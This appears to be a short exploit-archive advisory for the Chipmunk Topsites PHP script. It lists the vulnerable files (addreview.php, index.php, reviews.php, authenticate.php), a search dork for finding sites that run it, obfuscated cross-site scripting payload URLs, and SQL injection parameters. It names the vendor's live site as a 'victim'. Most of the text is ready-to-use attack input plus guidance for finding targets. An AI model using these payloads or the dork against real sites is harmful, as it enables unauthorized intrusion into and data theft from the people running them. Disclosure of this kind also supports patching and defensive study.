Chipmunk Topsites suffers from cross site scripting and SQL injection vulnerabilities.
4ae68170a1dc25712986b26ce42e22e7c3e0dd1019ceece872cedc96687893f6
#########################################################
---------------------------------------------------------
Portal Name: Chipmunk Topsites
Vendor : http://www.chipmunk-scripts.com/page.php?ID=10
Download : http://www.chipmunk-scripts.com/topsites/topsites.zip
Vulnerable File's : addreview.php,index.php,reviews.php,authenticate.php
Dork: Powered by (c) Chipmunk Topsites
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (XSS/SQL)
---------------------------------------------------------
#########################################################
[XSS]:
http://www.site.com/topsites/addreview.php?ID=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt
>
http://www.site.com/topsites/index.php?start=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt
>
http://www.site.com/topsites/reviews.php?ID=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt
>
[SQL]:
http://www.site.com/topsites/addreview.php?ID=[SQL]
http://www.site.com/topsites/authenticate.php?topsiteuser=[SQL]
---------------------------------
Victem :
http://www.chipmunk-scripts.com/topsites